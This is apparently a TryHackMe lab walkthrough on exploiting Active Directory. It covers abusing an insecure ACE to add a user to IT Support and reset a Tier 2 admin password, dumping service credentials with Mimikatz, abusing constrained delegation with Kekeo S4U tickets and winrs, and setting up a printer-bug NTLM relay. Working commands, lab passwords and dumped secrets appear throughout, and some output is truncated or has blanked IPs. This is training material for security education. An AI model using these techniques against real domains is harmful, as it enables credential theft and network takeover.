【THM Walkthrough】Exploiting Active Directory (1)

As before, start by downloading the VPN file for this AD network from the Access page:


Task 2 Exploiting Permission Delegation

After launching BloodHound the screen looks like the figure below; the Upload Data button (where the finger points) imports the zip file of internal-network data collected by SharpHound:


Once the data is imported, click where the figure points and enter two node names (DOMAIN USERS@ZA.TRYHACKME.LOC and Tier 2 ADMINS@ZA.TRYHACKME.LOC) to query the attack path between them. Both nodes are groups, not hosts.

The figure above also exposes a permission-delegation flaw in the target domain: the administrator misconfigured delegation over the IT Support group by granting Domain Users an insecure ACE, so any member of Domain Users (including the initial low-privilege AD account we hold) can add accounts to the IT Support group. BloodHound further shows that the IT Support group holds a ForceChangePassword ACE over the members of the Tier 2 Admins group.
The first step of this attack path is to add our initial AD account to the IT Support group, which we do with the Add-ADGroupMember PowerShell cmdlet from the AD-RSAT toolset.

Before that, configure the attacking machine's network: add the DC's IP as a DNS server, otherwise the lab hostnames will not resolve:

Request a set of low-privilege credentials from http://distributor.za.tryhackme.loc/creds:


Log in as kathleen.allen and add that account to the IT Support group.

└─$ ssh za.tryhackme.loc\\kathleen.allen@thmwrk1.za.tryhackme.loc
za.tryhackme.loc\kathleen.allen@thmwrk1.za.tryhackme.loc's password: 

Microsoft Windows [Version 10.0.17763.1098]
(c) 2018 Microsoft Corporation. All rights reserved.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\kathleen.allen> $user = Get-ADUser -Identity 'kathleen.allen'
PS C:\Users\kathleen.allen> $group = Get-ADGroup -Identity 'IT Support'
PS C:\Users\kathleen.allen> net user kathleen.allen /domain
The request will be processed at a domain controller for domain za.tryhackme.loc.

User name                    kathleen.allen
Full Name                    Kathleen Allen
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            4/25/2022 6:30:07 PM
Password expires             Never
Password changeable          4/26/2022 6:30:07 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   12/17/2023 5:38:43 AM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Internet Access      *Domain Users
The command completed successfully.

PS C:\Users\kathleen.allen> Add-ADGroupMember -Identity $group -Members $user
PS C:\Users\kathleen.allen> net user kathleen.allen /domain                  
The request will be processed at a domain controller for domain za.tryhackme.loc.

User name                    kathleen.allen
Full Name                    Kathleen Allen
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            4/25/2022 6:30:07 PM
Password expires             Never
Password changeable          4/26/2022 6:30:07 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   12/17/2023 5:38:43 AM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Internet Access      *IT Support
                             *Domain Users
The command completed successfully.

Now that we are a member of IT Support, we inherit the ForceChangePassword delegation over the Tier 2 Admins group. To abuse it, first enumerate the members of Tier 2 Admins and pick one as the target, again with Get-ADGroupMember, then force-reset that user's password with Set-ADAccountPassword. Note that the first attempt below, issued from a different session (brenda.fowler), fails with Access is denied: group membership is evaluated when the logon token is built, so a newly granted membership only takes effect in a fresh logon. The second attempt, in a new session as kathleen.allen, succeeds:
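Before abusing the two ACEs, it is worth confirming them from the directory itself rather than trusting the BloodHound graph alone. The following is an added example, not code from the original walkthrough or from TryHackMe; it assumes the AD RSAT module is loaded (as in the THMWRK1 session above) and that the current user can read the security descriptors, which any domain user can by default. The schema GUIDs are Microsoft's documented values for the member attribute and the User-Force-Change-Password extended right.

```powershell
# Added example: verify the AddMember and ForceChangePassword ACEs BloodHound reported.
Import-Module ActiveDirectory

# Well-known schema GUIDs (documented by Microsoft).
$MemberAttrGuid          = [guid]'bf9679c0-0de6-11d0-a285-00aa003049e2'  # "member" attribute
$ForceChangePasswordGuid = [guid]'00299570-246d-11d0-a768-00aa006e0529'  # User-Force-Change-Password
$AllGuid                 = [guid]'00000000-0000-0000-0000-000000000000'  # ACE applies to everything

function Get-InterestingAces {
    # Return Allow ACEs on $DistinguishedName that grant $Right for the given object type
    # (or for all object types), plus any GenericAll ACE, which implies every right.
    param(
        [Parameter(Mandatory)][string]$DistinguishedName,
        [Parameter(Mandatory)][guid]$ObjectTypeGuid,
        [Parameter(Mandatory)][System.DirectoryServices.ActiveDirectoryRights]$Right
    )
    $genericAll = [int][System.DirectoryServices.ActiveDirectoryRights]::GenericAll
    $acl = Get-Acl -Path ("AD:\" + $DistinguishedName)
    $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        ($_.ObjectType -eq $ObjectTypeGuid -or $_.ObjectType -eq $AllGuid) -and
        ((([int]$_.ActiveDirectoryRights -band [int]$Right) -ne 0) -or
         (([int]$_.ActiveDirectoryRights -band $genericAll) -eq $genericAll))
    } | Select-Object IdentityReference, ActiveDirectoryRights, ObjectType, IsInherited
}

# 1. Who may modify the "member" attribute of IT Support?  WriteProperty on member
#    (or GenericWrite/GenericAll) allows adding anyone; the Self validated write
#    allows a principal to add only itself.
$itSupport   = Get-ADGroup -Identity 'IT Support'
$memberRight = [System.DirectoryServices.ActiveDirectoryRights]::WriteProperty -bor
               [System.DirectoryServices.ActiveDirectoryRights]::Self
Write-Host "== Principals that can change membership of $($itSupport.Name)"
Get-InterestingAces -DistinguishedName $itSupport.DistinguishedName `
    -ObjectTypeGuid $MemberAttrGuid -Right $memberRight | Format-Table -AutoSize

# 2. Who holds User-Force-Change-Password over each Tier 2 Admins member?
foreach ($member in Get-ADGroupMember -Identity 'Tier 2 Admins') {
    Write-Host "== ForceChangePassword holders on $($member.SamAccountName)"
    Get-InterestingAces -DistinguishedName $member.distinguishedName `
        -ObjectTypeGuid $ForceChangePasswordGuid `
        -Right ([System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight) |
        Format-Table -AutoSize
}
```

The IdentityReference column is the trustee as written in the ACE (here, ZA\Domain Users and ZA\IT Support); whether you actually hold the right depends on the groups in your logon token, which is why the password reset only works from a session opened after the group change.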

PS C:\Users\brenda.fowler> $t2admin = Get-ADGroupMember -Identity 'Tier 2 Admins' | Get-Random -Count 1
PS C:\Users\brenda.fowler> $t2admin.Name
PS C:\Users\brenda.fowler> $password = 'strong.pass1' | ConvertTo-SecureString -AsPlainText -Force
PS C:\Users\brenda.fowler> Set-ADAccountPassword -Identity $t2admin -Reset -NewPassword $password
Set-ADAccountPassword : Access is denied
At line:1 char:1
+ Set-ADAccountPassword -Identity $t2admin -Reset -NewPassword $passwor ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (CN=t2_leon.fran...ryhackme,DC=loc:ADAccount) [Set-ADAccountPa  
   ssword], UnauthorizedAccessException
    + FullyQualifiedErrorId : ActiveDirectoryCmdlet:System.UnauthorizedAccessException,Microsoft.ActiveDirecto  

PS C:\Users\brenda.fowler> gpupdate /force
Updating policy...

Computer Policy update has completed successfully.
User Policy update has completed successfully.


za\kathleen.allen@THMWRK1 C:\Users\kathleen.allen>powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\kathleen.allen> $Password = ConvertTo-SecureString "Password123!" -AsPlainText -Force
PS C:\Users\kathleen.allen> Set-ADAccountPassword -Identity "T2_LEON.FRANCIS" -Reset -NewPassword $Password


└─$ ssh za.tryhackme.loc\\t2_leon.francis@thmwrk1.za.tryhackme.loc
za.tryhackme.loc\t2_leon.francis@thmwrk1.za.tryhackme.loc's password: 

Microsoft Windows [Version 10.0.17763.1098]
(c) 2018 Microsoft Corporation. All rights reserved.

za\t2_leon.francis@THMWRK1 C:\Users\t2_leon.francis>

Because t2_leon.francis is a member of the Tier 2 Admins group, abusing the permission delegation has escalated our privileges to Tier 2 Administrator.

Microsoft Windows [Version 10.0.17763.1098]
(c) 2018 Microsoft Corporation. All rights reserved.

za\t2_leon.francis@THMWRK1 C:\Users\t2_leon.francis>cd .. 

za\t2_leon.francis@THMWRK1 C:\Users>cd Administrator\Desktop 

za\t2_leon.francis@THMWRK1 C:\Users\Administrator\Desktop>dir 
 Volume in drive C is Windows                              
 Volume Serial Number is 1634-22A9                         

 Directory of C:\Users\Administrator\Desktop               

06/16/2022  05:09 PM    <DIR>          .                   
06/16/2022  05:09 PM    <DIR>          ..                  
04/30/2022  10:53 AM                31 flag1.txt           
               1 File(s)             31 bytes              
               2 Dir(s)  50,562,793,472 bytes free         

za\t2_leon.francis@THMWRK1 C:\Users\Administrator\Desktop>type flag1.txt 

Task 3 Exploiting Kerberos Delegation

token::elevate - to dump secrets from the registry hives we need to impersonate the SYSTEM account; this command elevates to that token.
lsadump::secrets - tells Mimikatz to read the registry hives and recover cleartext credentials stored there.
In the output below we find the service account svcIIS@za.tryhackme.loc with the password Password1@.

za\t2_leon.francis@THMWRK1 C:\Users\Administrator\Desktop>type flag1.txt
za\t2_leon.francis@THMWRK1 C:\Users\Administrator\Desktop>cd ..

za\t2_leon.francis@THMWRK1 C:\Users\Administrator>cd ..

za\t2_leon.francis@THMWRK1 C:\Users>cd ..

za\t2_leon.francis@THMWRK1 C:\>C:\Tools\mimikatz_trunk\x64\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53             
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)                              
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) 
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz                  
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com ) 
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/ 

mimikatz # privilege::debug 
Privilege '20' OK 

mimikatz # token::elevate 
Token Id  : 0 
User name :

492     {0;000003e7} 1 D 17536          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary 
 -> Impersonated !
 * Process Token : {0;000878a9} 0 D 687146      ZA\t2_leon.francis      S-1-5-21-3885271727-2693558621-265899518
5-3660  (12g,24p)       Primary
 * Thread Token  : {0;000003e7} 1 D 708037      NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Imperson
ation (Delegation)

mimikatz # lsadump::secrets 
Domain : THMWRK1 
SysKey : a1403e57976b472bce5f231922ca3942

Local name : THMWRK1 ( S-1-5-21-3226461851-763325627-4205969673 )
Domain name : ZA ( S-1-5-21-3885271727-2693558621-2658995185 ) 
Domain FQDN : za.tryhackme.loc

Policy subsystem is : 1.18
LSA Key(s) : 1, default {cfcff4be-beab-7d93-cfa3-edb6a9a3bf27}
  [00] {cfcff4be-beab-7d93-cfa3-edb6a9a3bf27} 929bd1cdc726d31f5eea6fa5266a09521afd0be6309a08fd604c9a95c2af4463 

Secret  : $MACHINE.ACC
cur/text: 0FFIKa"c[#L6T>=.s*ZW'Gz04FL&7,"VjxxhLeXqmI\%Q%c..g?=olZZlnTA#J@;*8+&?neR%>l_W!w&.oz@1MDJHs`&suI rmg,g 
old/text: 0FFIKa"c[#L6T>=.s*ZW'Gz04FL&7,"VjxxhLeXqmI\%Q%c..g?=olZZlnTA#J@;*8+&?neR%>l_W!w&.oz@1MDJHs`&suI rmg,g 

Secret  : DefaultPassword
old/text: vagrant

cur/hex : 01 00 00 00 b6 54 c4 83 d9 88 10 f6 ee ae fc b7 ed 2d a2 d6 47 11 3f 8f 4a 6d 7f 72 35 b8 a2 93 3d 5c 
5e 3f 03 8d 79 49 90 e7 2e e0
    full: b654c483d98810f6eeaefcb7ed2da2d647113f8f4a6d7f7235b8a2933d5c5e3f038d794990e72ee0
    m/u : b654c483d98810f6eeaefcb7ed2da2d647113f8f / 4a6d7f7235b8a2933d5c5e3f038d794990e72ee0 
old/hex : 01 00 00 00 10 4d a3 82 e2 da 30 1f 33 d6 49 a4 c9 81 26 e5 25 59 bb 9f 8a 76 b1 5d 59 c6 87 c6 32 b7 
02 0b c1 5b 24 f4 44 d0 74 31  
    full: 104da382e2da301f33d649a4c98126e52559bb9f8a76b15d59c687c632b7020bc15b24f444d07431
    m/u : 104da382e2da301f33d649a4c98126e52559bb9f / 8a76b15d59c687c632b7020bc15b24f444d07431 

Secret  : NL$KM
cur/hex : 10 bb 99 02 da 94 4a 26 cd ad 07 f3 62 64 53 5c a8 12 be e3 16 1f 8f 99 ae ab 97 37 c4 bc ee df 63 7c 
2f 6d 07 c5 d9 5e 29 e7 ce ce 48 52 47 19 8a 03 99 ff 97 ec 7f 49 a1 79 15 d9 a0 04 ac 58  
old/hex : 10 bb 99 02 da 94 4a 26 cd ad 07 f3 62 64 53 5c a8 12 be e3 16 1f 8f 99 ae ab 97 37 c4 bc ee df 63 7  
2f 6d 07 c5 d9 5e 29 e7 ce ce 48 52 47 19 8a 03 99 ff 97 ec 7f 49 a1 79 15 d9 a0 04 ac 58

Secret  : _SC_thmwinauth / service 'thmwinauth' with username : svcIIS@za.tryhackme.loc
cur/text: Password1@

tgt::ask /user:svcIIS /domain:za.tryhackme.loc /password:Password1@
/user - the account that holds the constrained-delegation rights.
/domain - the target domain name; Kekeo can also forge tickets to abuse cross-forest trusts, so the domain must be stated explicitly.
/password - the password of the svcIIS account.
tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor.jones /service:http/THMSERVER1.za.tryhackme.loc
/tgt - the TGT generated in the previous step.
/user - the user we want to impersonate. Since t2 accounts have administrative access to the workstations, we can assume that t1 accounts have administrative access to the target server, so we pick a t1 account (t1_trevor.jones) to impersonate.
/service - the service we want to impersonate the user to via delegation. We first generate a TGS for the HTTP service, then rerun the same command for the WSMAN service.
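The walkthrough takes svcIIS's delegation targets as given; in a real engagement you would enumerate them first, and check that the account allows protocol transition, because the S4U2Self then S4U2Proxy chain that kekeo's tgs::s4u performs only yields a forwardable ticket when that flag is set. The following is an added example, not part of the original post or of kekeo; it assumes the AD RSAT module is available and that the current user can read the directory, which is the default for domain users. The userAccountControl bit value is Microsoft's documented TRUSTED_TO_AUTH_FOR_DELEGATION flag.

```powershell
# Added example: list accounts configured for constrained delegation, the SPNs they may
# delegate to, and whether "Use any authentication protocol" (protocol transition) is on.
Import-Module ActiveDirectory

# userAccountControl flag TRUSTED_TO_AUTH_FOR_DELEGATION (protocol transition).
$TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000

function Get-ConstrainedDelegation {
    # Any object (user or computer) with msDS-AllowedToDelegateTo populated is
    # configured for constrained delegation to the listed SPNs.
    Get-ADObject -LDAPFilter '(msDS-AllowedToDelegateTo=*)' `
        -Properties 'sAMAccountName', 'msDS-AllowedToDelegateTo', 'userAccountControl' |
    ForEach-Object {
        [pscustomobject]@{
            Account            = $_.sAMAccountName
            ObjectClass        = $_.ObjectClass
            ProtocolTransition = (($_.userAccountControl -band $TRUSTED_TO_AUTH_FOR_DELEGATION) -ne 0)
            DelegateTo         = (@($_.'msDS-AllowedToDelegateTo') -join '; ')
        }
    }
}

# Everything in the domain that can delegate somewhere.
Get-ConstrainedDelegation | Format-Table -AutoSize

# The account recovered from the THMWRK1 secrets above.  tgs::s4u will only succeed for
# SPNs that appear in DelegateTo, and only if ProtocolTransition is True when we start
# from the service account's password rather than from a ticket of the victim user.
Get-ConstrainedDelegation | Where-Object Account -eq 'svcIIS' | Format-List
```

If the allowed SPN list contains a different service on the same host (for example cifs instead of wsman), the ticket can still be requested for the listed service: the service name sits in the unencrypted part of the ticket and the key is the host's machine-account key, so tools that support an alternate service name can rewrite it after the fact.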

PS C:\> C:\Tools\kekeo\x64\kekeo.exe

  ___ _    kekeo 2.1 (x64) built on Dec 14 2021 11:51:55 
 /   ('>-  "A La Vie, A L'Amour"
 | K  |    /* * *
 \____/     Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
  L\_       https://blog.gentilkiwi.com/kekeo                (oe.eo)
                                             with 10 modules * * */

kekeo # tgt::ask /user:svcIIS /domain:za.tryhackme.loc /password:Password1@ 
Realm        : za.tryhackme.loc (za) 
User         : svcIIS (svcIIS)
CName        : svcIIS   [KRB_NT_PRINCIPAL (1)]
SName        : krbtgt/za.tryhackme.loc  [KRB_NT_SRV_INST (2)]
Need PAC     : Yes
Auth mode    : ENCRYPTION KEY 23 (rc4_hmac_nt      ): 43460d636f269c709b20049cee36ae7a 
[kdc] name: THMDC.za.tryhackme.loc (auto)
[kdc] addr: (auto)
  > Ticket in file 'TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi' 

kekeo # tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor
.jones /service:http/THMSERVER1.za.tryhackme.loc
Ticket  : TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi 
  [krb-cred]     S: krbtgt/za.tryhackme.loc @ ZA.TRYHACKME.LOC
  [krb-cred]     E: [00000012] aes256_hmac       
  [enc-krb-cred] P: svcIIS @ ZA.TRYHACKME.LOC
  [enc-krb-cred] T: [12/17/2023 6:46:18 AM ; 12/17/2023 4:46:18 PM] {R:12/24/2023 6:46:18 AM}
  [enc-krb-cred] F: [40e10000] name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
  [enc-krb-cred] K: ENCRYPTION KEY 18 (aes256_hmac      ): dbdf390fe81443fa8129fd5f94ff62cfa250aa28f9827a219f00d
  [s4u2self]  t1_trevor.jones
[kdc] name: THMDC.za.tryhackme.loc (auto)
[kdc] addr: (auto)
  > Ticket in file 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_svcIIS@ZA.TRYHACKME.LOC.kirbi'
  [s4u2proxy] http/THMSERVER1.za.tryhackme.loc
  > Ticket in file 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi

kekeo # tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor
.jones /service:wsman/THMSERVER1.za.tryhackme.loc
Ticket  : TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi
  [krb-cred]     S: krbtgt/za.tryhackme.loc @ ZA.TRYHACKME.LOC
  [krb-cred]     E: [00000012] aes256_hmac
  [enc-krb-cred] P: svcIIS @ ZA.TRYHACKME.LOC
  [enc-krb-cred] S: krbtgt/za.tryhackme.loc @ ZA.TRYHACKME.LOC
  [enc-krb-cred] T: [12/17/2023 6:46:18 AM ; 12/17/2023 4:46:18 PM] {R:12/24/2023 6:46:18 AM}
  [enc-krb-cred] F: [40e10000] name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
  [enc-krb-cred] K: ENCRYPTION KEY 18 (aes256_hmac      ): dbdf390fe81443fa8129fd5f94ff62cfa250aa28f9827a219f00d
  [s4u2self]  t1_trevor.jones
[kdc] name: THMDC.za.tryhackme.loc (auto)
  > Ticket in file 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_svcIIS@ZA.TRYHACKME.LOC.kirbi'
  [s4u2proxy] wsman/THMSERVER1.za.tryhackme.loc
  > Ticket in file 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirb

kekeo # exit
PS C:\> C:\Tools\mimikatz_trunk\x64\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC

* File: 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi': OK     

mimikatz # kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.

* File: 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi': OK      

mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF7AE6443B8

mimikatz # exit
PS C:\> klist

Current LogonId is 0:0x878a9

Cached Tickets: (2)

#0>     Client: t1_trevor.jones @ ZA.TRYHACKME.LOC
        Server: http/THMSERVER1.za.tryhackme.loc @ ZA.TRYHACKME.LOC
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
        Start Time: 12/17/2023 6:46:34 (local)
        End Time:   12/17/2023 16:46:18 (local)
        Renew Time: 12/24/2023 6:46:18 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:

#1>     Client: t1_trevor.jones @ ZA.TRYHACKME.LOC
        Server: wsman/THMSERVER1.za.tryhackme.loc @ ZA.TRYHACKME.LOC
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
        Start Time: 12/17/2023 6:46:48 (local)
        End Time:   12/17/2023 16:46:18 (local)
        Renew Time: 12/24/2023 6:46:18 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:



It's possible to use the native Windows binary winrs to connect to a remote endpoint over WinRM, for example:

winrs -r:ws01 "cmd /c hostname & notepad"

In that generic example we connect from DC01 to WS01 and run two processes, hostname and notepad; on the remote host both appear as children of winrshost.exe, which is the parent/child relationship defenders look for. Here we use the tickets we just injected to open a shell on THMSERVER1 as t1_trevor.jones:

PS C:\> winrs -r:thmserver1.za.tryhackme.loc cmd
Microsoft Windows [Version 10.0.17763.1098] 
(c) 2018 Microsoft Corporation. All rights reserved.



C:\Users\t1_trevor.jones>cd .. 
cd .. 

C:\Users>cd Administrator\Desktop 
cd Administrator\Desktop 

 Volume in drive C is Windows 
 Volume Serial Number is 1634-22A9

 Directory of C:\Users\Administrator\Desktop

04/30/2022  01:10 PM    <DIR>          .
04/30/2022  01:10 PM    <DIR>          ..
04/30/2022  01:10 PM                92 flag2.txt
               1 File(s)             92 bytes
               2 Dir(s)  50,854,244,352 bytes free

C:\Users\Administrator\Desktop>type flag2.txt 
type flag2.txt 

Task 4 Exploiting Automated Relays

Next we look at automated relays in the authentication mechanism (NTLM relay) and how to coerce authentication. AD has an exception where one machine holds administrative rights over another machine; in effect the AD configuration grants one host admin rights on a second host. This is expected for things that must synchronise, such as domain controllers or SQL clusters, but it gives an attacker a very interesting vector for coerced authentication.




Printer Bug
The printer bug is a feature of the MS-RPRN protocol (Print System Remote Protocol) that lets any domain user remotely force a host running the Print Spooler service to authenticate to an arbitrary IP address. Similar issues of recent years include Spooler, PetitPotam and PrintNightmare. Microsoft's position is that the only real bug was that some of these could be triggered without any AD credentials, and that has been fixed by security patches.
To abuse the printer bug for coerced authentication, besides the coerced machine's account holding admin rights on the host we relay to, the following four conditions must hold:

  1. A set of valid AD credentials for the target domain.
  2. Network connectivity to the target's SMB service.
  3. The host we coerce must be running the Print Spooler service.
  4. The host we relay to must not enforce SMB signing (nmap reports "Message signing enabled but not required").

Print Spooler service
We need to determine whether the Print Spooler service is running on the target. Because we cannot access THMSERVER2 directly, we query it from inside the domain: in the SSH session on the jump host THMWRK1 we can use a WMI query to check the current state of the target's spooler service:

Microsoft Windows [Version 10.0.17763.1098]
(c) 2018 Microsoft Corporation. All rights reserved.

za\christine.hall@THMWRK1 C:\Users\christine.hall>powershell -ep bypass        
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\christine.hall>
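One way to check the spooler prerequisite from the jump host, as an added example that is not part of the original walkthrough. It assumes a Windows PowerShell 5.1 session as a plain domain user on THMWRK1 (no admin rights on the targets) and uses the lab hostnames. The spoolss named pipe is the MS-RPRN endpoint that SpoolSample talks to, so being able to open it is the check that matters; the remote SCM query is a best-effort extra that a hardened host may refuse.

```powershell
# Added example: which hosts expose a running Print Spooler to a plain domain user?
function Test-SpoolerExposed {
    param([Parameter(Mandatory)][string[]]$ComputerName)
    foreach ($c in $ComputerName) {
        # Any authenticated user can normally open \\host\pipe\spoolss over SMB;
        # if the pipe is absent the spooler is not listening and coercion will fail.
        $pipe = $false
        try {
            $pipe = $null -ne (Get-Item -Path "\\$c\pipe\spoolss" -ErrorAction Stop)
        } catch {
            Write-Warning "$c : could not open spoolss pipe ($($_.Exception.Message))"
        }

        # Remote SCM status query (Windows PowerShell only; Authenticated Users may
        # query service status by default, but some hosts restrict it).
        $state = 'unknown'
        try {
            $state = (Get-Service -ComputerName $c -Name Spooler -ErrorAction Stop).Status
        } catch { }

        [pscustomobject]@{
            Computer      = $c
            Smb445Open    = Test-NetConnection -ComputerName $c -Port 445 -InformationLevel Quiet
            SpoolssPipe   = $pipe
            SpoolerStatus = $state
        }
    }
}

Test-SpoolerExposed -ComputerName 'thmserver1.za.tryhackme.loc', 'thmserver2.za.tryhackme.loc' |
    Format-Table -AutoSize
```

SpoolssPipe is the value to trust: True on THMSERVER2 means the coercion target is viable, while SMB signing on the relay target is still checked from the attack machine with nmap as below.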

The scan below shows that SMB signing is enabled but not required on the target servers. With that, every condition for using the printer bug to run an NTLM relay attack (a coerced-authentication attack) is met.

└─$ sudo nmap --script=smb2-security-mode -p445 thmserver1.za.tryhackme.loc thmserver2.za.tryhackme.loc
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-22 00:24 EST
Nmap scan report for thmserver1.za.tryhackme.loc (
Host is up (0.25s latency).

445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Nmap scan report for thmserver2.za.tryhackme.loc (
Host is up (0.44s latency).

445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Nmap done: 2 IP addresses (2 hosts up) scanned in 11.15 seconds

Note: this attack is unreliable; abusing the Print Spooler service can crash it, and a callback is not guaranteed.
We will use SpoolSample.exe to coerce THMSERVER2 into authenticating to our attack machine, then use ntlmrelayx.py from Impacket to relay that authentication attempt to THMSERVER1. If you are using a local Kali attack machine, make sure its Impacket is recent enough to support SMBv2.

Set up the NTLM relay; "Servers started, waiting for connections" means it is ready. Use IP addresses rather than hostnames here and for the capture server passed to SpoolSample below: a client pointed at a hostname will try Kerberos, which cannot be relayed, whereas a bare IP address has no SPN, so the client falls back to NTLM.

└─$ locate ntlmrelayx.py        

└─$ /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -smb2support -t smb:// -debug  
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client MSSQL loaded..
[+] Protocol Attack IMAP loaded..
[+] Protocol Attack IMAPS loaded..
[+] Protocol Attack RPC loaded..
[+] Protocol Attack HTTP loaded..
[+] Protocol Attack HTTPS loaded..
[+] Protocol Attack LDAP loaded..
[+] Protocol Attack LDAPS loaded..
[+] Protocol Attack DCSYNC loaded..
[+] Protocol Attack SMB loaded..
[+] Protocol Attack MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections


PS C:\Users\christine.hall> cd C:\Tools                                   
PS C:\Tools> dir 

    Directory: C:\Tools

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        4/29/2022  11:48 AM                kekeo
d-----        4/30/2022  11:52 AM                mimikatz_trunk
d-----        4/30/2022  11:38 AM                PowerSploit
-a----       12/21/2023   5:26 AM         282814 20231221052630_BloodHound.zip 
-a----        4/30/2022  12:47 PM         770279 PowerView.ps1
-a----        6/10/2022  11:49 AM         906752 SharpHound.exe
-a----        6/13/2022   6:57 PM         157696 SpoolSample.exe


PS C:\Tools> .\SpoolSample.exe THMSERVER2.za.tryhackme.loc
[+] Converted DLL to shellcode
[+] Executing RDI
[+] Calling exported function
TargetServer: \\THMSERVER2.za.tryhackme.loc, CaptureServer: \\      
RpcRemoteFindFirstPrinterChangeNotificationEx failed.Error Code 1707 - The netw
ork address is invalid.

